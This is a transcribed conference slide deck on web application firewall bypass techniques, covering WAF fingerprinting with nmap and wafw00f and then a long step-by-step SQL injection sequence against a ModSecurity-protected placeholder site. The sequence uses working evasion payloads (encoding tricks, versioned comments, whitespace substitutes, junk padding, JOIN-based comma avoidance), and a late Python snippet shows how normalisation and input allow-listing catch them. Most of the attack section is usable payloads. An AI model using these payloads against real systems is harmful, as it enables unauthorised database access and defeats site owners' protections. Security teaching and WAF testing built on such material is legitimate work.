WAF Bypassing Techniques
Post on 16-Jan-2017
Avinash Kumar Thapa, Senior Security Analyst at Network Intelligence India
Bug hunter on HackerOne, CTF author on Vulnhub.com, with some exploits and PoCs on Exploit-DB as well. Passionate about web application security and exploit writing.
Agenda
● Introduction to Web Application Firewalls
● Operation Modes
● Vendors
● Fingerprinting WAF
● Ways to Bypass WAFs
● Practical Cases for Bypassing
● Conclusion
Introduction to Web Application Firewalls
● Operates at the application layer.
● Monitors all HTTP/HTTPS/SOAP/XML-RPC web service traffic between clients and servers, based on pre-defined signatures held in a database.
● The basic goal of a WAF is to monitor and block content that violates a pre-defined policy. These pre-defined policies are patterns of user input that end up in a potential attack.
● Understands HTTP and HTTPS traffic better than any traditional firewall.
Types of Operation Modes
Negative Model
A negative security model recognizes attacks by relying on a database of expected attack signatures.
Example: do not allow, on any page, any argument value (user input) that matches potential XSS strings like <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement.
Cons:
● Less protection.
Positive Model
A positive security model enforces positive behaviour by learning the application logic and building a security policy of valid known requests as a user interacts with the application.
Example: on page news.jsp, the field id may only accept characters [0-9], starting at 0 and going up to 65535, using intval conditions on the page (accepts only integers).
Pros:
● Better performance (fewer rules).
● Fewer false positives.
Cons:
● Much more time to implement.
● Some vendors provide an "automatic learning mode"; it helps, but is far from perfect. In the end, you always need a skilled human to review the policies.
Mix Model
Combination of both positive and negative model.
Testing Environments: Google Chrome, Mozilla Firefox, Internet Explorer, Opera Browser
Products
● F5 BIG-IP WAF
● Sucuri
● ModSecurity
● Imperva Incapsula
● PHP-IDS (PHP Intrusion Detection System)
● Quick Defense
● AQTRONIX WebKnight (for IIS, based on ISAPI filters)
● Barracuda WAF
Fingerprinting WAF: Citrix NetScaler WAF adds a cookie to the HTTP communication.
Fingerprinting WAF: F5 BIG-IP ASM
Fingerprinting WAF on the basis of the HTTP response
Other WAFs may be detected by the type of HTTP response we receive when submitting a malicious request; responses vary from one WAF to another. Some of the common responses are 403, 406, 419, 500, 501, etc.
Fingerprinting WAF: response for F5 BIG-IP (screenshot in the original slides)
Fingerprinting WAF: request and response for the ModSecurity firewall (screenshots in the original slides)
Fingerprinting WAF: response for the WebKnight firewall, and the same response rendered in the browser (screenshots in the original slides)
Automatic Fingerprinting of a WAF
Using Nmap scripts:
nmap -p80 --script http-waf-detect <host>
Using wafw00f.py:
python wafw00f.py --url <URL>
Techniques to Bypass WAFs
● Bypassing WAF for SQL injection vulnerabilities
● Bypassing WAF for XSS issues
● Bypassing WAF for LFI and RFI vulnerabilities
General techniques to bypass a WAF:
● Null character injection
● Mixed case
● Inline comments
● Chunked requests
● Buffer overflow
● HTTP parameter pollution
● URL encoding
● Keyword splitting
● Replaced keywords
● Ignoring cookies
● Using data URIs
● Header injection
Bypassing WAF for SQL Injection Vulnerabilities
Example 1 (without WAF)
https://abc.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
Example 1 (with WAF)
https://abc.com/index.php?id=1'
HTTP/1.1 403 Forbidden, or HTTP/1.1 406 Not Acceptable, or HTTP/1.1 404 Not Found, or HTTP/1.1 500 Internal Server Error, or HTTP/1.1 400 Bad Request
Some recon on the WAF: came to know that ModSecurity is in action.
https://abc.com/index.php?id=1"
HTTP/1.1 200 OK
https://abc.com/index.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ' at line 6
This technique is URL encoding.
Sometimes you need to use:
1) Double URL encoding: %2527 %27 '
2) Triple URL encoding: %252525 %2527 %27 ' (this is a very rare case)
https://abc.com/index.php?id=1
%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'ORDER' keyword blocked?
• Is the 'ORDER BY' keyword blocked?
• Is there any alternative to the ORDER BY query?
• Are spaces blocked?
Let’s Try
https://abc.com/index.php?id=1
%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
• The 'ORDER' keyword is blocked
• Check again: is 'ORDER' blocked?
https://abc.com/index.php?id=1
%27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind
• The 'ORDER' keyword is not blocked
• What is blocked, then?
SPACES ARE BLOCKED
https://abc.com/index.php?id=1
%27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1
%27ORDERby1 %23
HTTP/1.1 200 OK
No more assumptions in mind, because only spaces are blocked.
Techniques to bypass spaces
● Using '+' instead of a space, like order+by+1 (mostly blocked)
● Using inline comments '/**/' instead of spaces, like order/**/by/**/1
● Using a combination of inline comments and URL encoding instead of spaces, like:
• Order/%2a%2a/by/%2a%2a/1
• Order%2f**%2fby%2f**%2f1
● Using a combination of inline comments, URL encoding and junk characters instead of spaces, like:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
Techniques to bypass spaces
● Using whitespace characters %0a, %0b, %0c, %0d, %a0, %09, %01
The query will be: ORDER%0aby%0a1, ORDER%0bby%0b1, ORDER%0cby%0c1, ORDER%0Dby%0D1, ORDER%A0by%A01, ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1
%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Let's suppose the number of columns is 3.
https://abc.com/index.php?id=1
%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Are spaces blocked?
https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Spaces were bypassed using inline comments, and it is still blocked?
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
Techniques to bypass
If UNION is blocked:
● Using inline (versioned) comments: /*!50000UNION*/ /*!40000UNION*/ /*!00000UNION*/
● Using URL encoding techniques: %55nion, %2555nion (double URL encoding), %55%4e%49%4f%4e (UNION)
● Double URL encoding
● Triple URL encoding
https://abc.com/index.php?id=1
%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
https://abc.com/index.php?id=1
%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are integers blocked?
• Are commas blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
https://abc.com/index.php?id=1
%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1
%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
• The 'UNION' keyword is NOT blocked.
• The 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are NOT blocked.
• Is the combination "UNION SELECT" blocked?
• "SELECT with integers" is NOT blocked.
Techniques to bypass the combination "UNION SELECT"
● Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/
● Using whitespace characters and URL encoding of the comment marker (#):
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT
Techniques to bypass combination of “union select”
Using buffer overflow
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Sometimes you need to increase the amount of junk as required:
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT
Techniques to bypass the combination "UNION SELECT"
● Using the DISTINCT statement: UNION DISTINCT SELECT
● Using the DISTINCTROW statement: UNION DISTINCTROW SELECT
https://abc.com/index.php?id=1%27/**/UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23
HTTP/1.1 200 OK
Special case: what if commas get blocked?
https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• The 'UNION' keyword is NOT blocked.
• The 'SELECT' keyword is NOT blocked.
• Integers are NOT blocked.
• Commas are blocked.
• Is the combination "UNION SELECT" NOT blocked?
• "SELECT with integers" is NOT blocked.
Time to bypass commas “,”.
Basic bypasses
● URL encoding: %2c
● Double URL encoding: %252c %2c
● Using inline comments (/*!*/), like UNION SELECT 1/*!,*/2
Advanced way to bypass commas: using JOIN
JOIN is used for columns as UNION is used for rows.
We have SELECT 1,2,3; the equivalent without commas is:
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Advanced way to bypass commas
https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
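As an added defender-side illustration (not code from the slides), the following Python runs the payload variants shown in the SQL injection sequence above through three checks: a literal "UNION SELECT" signature on the raw value (the negative model as the slides describe it), the same signature after canonicalising the value (repeated URL decoding, stripping /**/ and /*!50000 */ comments, dropping "#" comments, folding unusual whitespace), and the positive model from the operation-modes section (an id that must be an integer from 0 to 65535). The SAMPLES dictionary is constructed from the slides' examples; the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed inputs: a benign id plus evasion variants copied from the
# slides (URL/double-URL encoding, /**/ and /*!50000 */ comments, "#"
# followed by junk and a newline, and %A0 as a space substitute).
SAMPLES = {
    "benign": "1",
    "plain": "1' UNION SELECT 1,2,3#",
    "comments": "1%27/**/UNION/**/SELECT/**/1,2,3%23",
    "versioned": "1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23",
    "mixed_case_enc": "1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23",
    "hash_newline": "1%27/**/UNION%23XXXXXXXXXXXX%0ASELECT/**/1,2,3%23",
    "double_enc": "1%2527%2520UNION%2520SELECT%25201,2,3%2523",
    "nbsp": "1%27%A0UNION%A0SELECT%A01,2,3%23",
}

SIGNATURE = re.compile(r"\bUNION\s+SELECT\b")

def naive_block(raw: str) -> bool:
    """Negative model as the slides describe it: match the raw value."""
    return SIGNATURE.search(raw.upper()) is not None

def normalize(raw: str) -> str:
    """Canonicalise the value so the evasions on the slides collapse."""
    s = raw
    for _ in range(3):                        # single, double, triple encoding
        decoded = unquote(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r"\1", s, flags=re.S)  # /*!50000X*/ -> X
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)              # /**/ -> space
    s = re.sub(r"#[^\n]*", " ", s)                            # "#..." up to newline
    s = re.sub(r"[\s\x00-\x1f\xa0]+", " ", s)                 # odd whitespace
    return s.upper().strip()

def normalized_block(raw: str) -> bool:
    """Same signature, applied after normalisation."""
    return SIGNATURE.search(normalize(raw)) is not None

def positive_allow(raw: str) -> bool:
    """Positive model from the operation-modes slide: integer 0..65535."""
    return re.fullmatch(r"[0-9]{1,5}", raw) is not None and int(raw) <= 65535

def evaluate(samples=SAMPLES) -> dict:
    """Per sample: (naive signature hit, normalised hit, positive-model allow)."""
    return {name: (naive_block(v), normalized_block(v), positive_allow(v))
            for name, v in samples.items()}
```

Every encoded variant slips past the raw signature but is caught once normalised, and the positive model rejects all of them without any signature at all, which is the point of the slides' pros and cons for the two modes.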
A similar approach works for other vulnerabilities: XSS, LFI / RFI.
DEMO TIME
References
Images in slides 10, 11, 14, 15, 16 and 17 are taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!